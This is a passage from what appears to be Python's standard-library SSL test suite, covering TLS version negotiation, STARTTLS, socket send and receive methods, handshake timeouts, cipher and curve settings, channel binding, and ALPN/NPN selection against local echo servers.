try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
        # Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
